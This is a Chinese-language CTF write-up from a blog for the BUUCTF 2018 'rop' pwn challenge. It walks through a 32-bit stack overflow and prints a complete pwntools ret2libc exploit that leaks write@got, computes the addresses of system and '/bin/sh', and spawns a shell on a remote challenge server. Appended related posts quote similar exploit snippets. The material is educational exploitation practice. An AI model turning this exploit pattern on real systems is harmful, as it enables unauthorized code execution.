铁人三项(第五赛区)_2018_rop

最新推荐文章于 2023-01-15 20:40:36 发布
最新推荐文章于 2023-01-15 20:40:36 发布
阅读量370 收藏
点赞数
分类专栏: BUU-PWN 文章标签: pwn python 网络安全 CTF WriteUP
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0sway/article/details/123892262
版权
这篇博客详细介绍了如何在2018年的铁人三项(第五赛区) rop挑战中,通过发现栈溢出漏洞,利用write()函数泄露地址并实现ret2libc技术获取shell。作者展示了步骤解析和完整的exploit代码,涉及ELF分析、地址计算和远程攻击过程。
摘要由CSDN通过智能技术生成

铁人三项(第五赛区)_2018_rop

使用checksec查看:


只开启了栈不可执行。

先放进IDA中分析:
在这里插入图片描述

  • 给出了漏洞函数,直接跟过去查看吧。

vulnerable_function()

在这里插入图片描述

  • return read(0, &buf, 0x100u);:可以读入0x100大小的数据,存在栈溢出。

题目思路

  • 存在栈溢出。
  • 程序中无system()/bin/sh字符串。
  • 利用write()函数泄露地址。
  • 使用ret2libc的方式getshell。

步骤解析:

先利用write()函数通过栈溢出,泄露出write@got的地址。

在这里插入图片描述

接着确定libc之后,计算出system()/bin/bash的地址。

在这里插入图片描述

再次利用栈溢出即可geshell。

在这里插入图片描述

完整exp

from pwn import *

#start
r = remote("node4.buuoj.cn",26594)
# r = process("../buu/铁人三项(第五赛区)_2018_rop")
elf = ELF("../buu/铁人三项(第五赛区)_2018_rop")
libc = ELF("../buu/ubuntu18(32).so")

#params
write_got = elf.got['write']
write_plt = elf.plt['write']
main_addr = elf.symbols['main']

#attack
payload = b'M'*(0x88+4) + p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) + p32(4)
r.sendline(payload)
write_addr = u32(r.recv(4))
print("write_addr: " + hex(write_addr))

#libc
base_addr = write_addr - libc.symbols['write']
system_addr = base_addr + libc.symbols['system']
bin_sh_addr = base_addr + next(libc.search(b'/bin/sh'))
print("system_addr: " + hex(system_addr))
print("bin_sh_addr" + hex(bin_sh_addr))

#attack2
payload2 = b'M'*(0x88+4) + p32(system_addr) + b'M'*4 +p32(bin_sh_addr)
r.sendline(payload2)

r.interactive()
m0sway
关注
专栏目录
BUUCTF:picoctf_2018_rop chain(write up)
qq_44768749的博客
08-26 1299
BUUCTF:picoctf_2018_rop chain0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp关键代码说明 0x01 文件分析 32位程序,开启了栈不可执行、部分RELRO保护 0x02 运行 输入一串字符串,根据题名也知道需要构造ROP 0x03 IDA 主函数 vuln函数 漏洞点:没有限制输入字符串长度 flag函数 win_function1函数 win_function2函数 0x04 思路 flag函数为后门函数
pwn学习资料整理——ROP技术(pwn_rop1)
08-30
pwn学习资料整理——ROP技术(pwn_rop1)
【BUUCTFPWN铁人三项(第五赛区)_2018_rop
m0_55368674的博客
01-15 355
【BUUCTFPWN铁人三项(第五赛区)_2018_rop题解
[PWN]铁人三项(第五赛区)_2018_rop
LDX的博客
11-27 243
[PWN] BUUCTF 铁人三项(第五赛区)_2018_rop
[BUUCTF-pwn]——铁人三项(第五赛区)_2018_rop
Y_peak的博客
02-11 459
[BUUCTF-pwn]——铁人三项(第五赛区)_2018_rop 题目地址: https://buuoj.cn/challenges#铁人三项(第五赛区)_2018_rop 思路:没有sytem函数,所以应该需要自己去找. 从旁边的函数列表发现了write函数,可以利用将 read 函数的 got所储存的内容泄露出来,泄露出read函数的实际地址 。利用循环调用,再次调用read函数, 然后利用偏移找到system函数和 '/bin/sh'字符串的位置。最后组成payload exploit
铁人三项(第五赛区)2018 rop
pondzhang的专栏
05-09 512
from pwn import * p = process('./2018_rop') gotwrite = 0x0804A010 pltwrite = 0x080483A0 start = 0x080483C0 bss = 0x0804A020 pltread = 0x08048360 def leak(address): payload = 'a' * 140 + p32(pltwrite) + p32(start) + p32(0x01) + p32(address) + p32(0x04
BUUCTF(pwn)铁人三项(第五赛区)_2018_rop
半岛铁盒的博客
03-30 362
最基本的 rop; from pwn import* from LibcSearcher import* r=remote('node3.buuoj.cn',25292) elf=ELF('./2') write_got=elf.got['write'] write_plt=elf.plt['write'] main=0x80484c6 payload='a'*(0x88+4)+p32(write_plt)+p32(main)+p32(1)+p32(write_got)+p32(4) r.sendl
rop-sample.rar_.comrop_rop_rop源码下载_taobao netty
09-20
ROP技术解析与Netty应用实战》 ROP(Return-Oriented Programming,返回导向编程)是一种高级的利用技术,常用于安全领域,特别是在软件漏洞利用中。ROP允许攻击者通过跳转到现有代码片段(通常称为“gadgets”)...
picoctf_2018_rop chain
最新发布
03-16
picoctf_2018_rop chain是一道CTF比赛中的题目,需要使用ROP(Return Oriented Programming)技术来解决。ROP是一种利用程序中已有的代码段(称为gadget)来构造攻击代码的技术,通过将多个gadget串联起来,可以实现...
STM8_Unlock_Flash_ROP_issue_ROPCLEAR_unlock_stm8s003_stm8s103_
10-03
"stm8l001j3.pdf"和"stm8s001j3_2018.pdf"以及"STM8S001J3.pdf"虽然主要针对的是STM8L001J3和STM8S001J3型号,但可能包含了一些通用的信息和概念,例如闪存操作和安全特性,对于理解STM8S103的ROP问题也有参考价值。...
中文UML建模工具Trufun Plato 2005.rar
06-03
中文UML建模工具Trufun Plato 2005.rar
buuctf|pwn-铁人三项(第五赛区)_2018_rop-wp
l2645470582_的博客
11-09 720
1.检查保护机制 2.我们用32位的IDA打开该文件 shift+f12查看关键字符串,没有发现关键字符串 3.我们查看main函数里面的内容 我们发现有两个函数 进入第一个函数 进入第二个函数 在第二个函数里面发现buf溢出,buf有0x88个字节,但是read()函数读取了0x100个字节 4.system("/bin/sh") 我们在文件中没有找到可以拿到shellcode权限 所以我们要用libc,计算偏移量,拿到shellcode权限...
铁人三项_第五赛区_2018_rop
z1r0的博客
12-05 165
铁人三项_第五赛区_2018_rop 查看保护 溢出,ret2libc from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 27080) else: r = process(file_name) elf = ELF(file_name) def dbg(
buuctf 铁人三项(第五赛区)_2018_rop
carol2358的博客
04-26 386
常规的32位泄漏libc,比较蛋痛的是我常规的写法不知道为什么出错,以后要多注意recv到的东西 exp: from pwn import * from LibcSearcher import * local_file = './2018_rop' local_libc = './libc.so.6' remote_libc = './libc.so.6' select = 1 ...
[BUUCTF]PWN——铁人三项(第五赛区)_2018_rop
BangSen1的博客
03-22 235
铁人三项(第五赛区)_2018_rop 32位,开启NX保护 运行程序。 用IDA打开,跳转到main函数 没有什么有用的信息,vulnerable_function()函数是输入点。 利用write函数来泄露程序的libc版本 知道libc版本后再计算程序里的system函数和字符串“/bin/sh”的地址 最后再覆盖返回地址 from pwn import * from LibcSearcher import * r=remote('node3.buuoj.cn',27850) elf=ELF
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值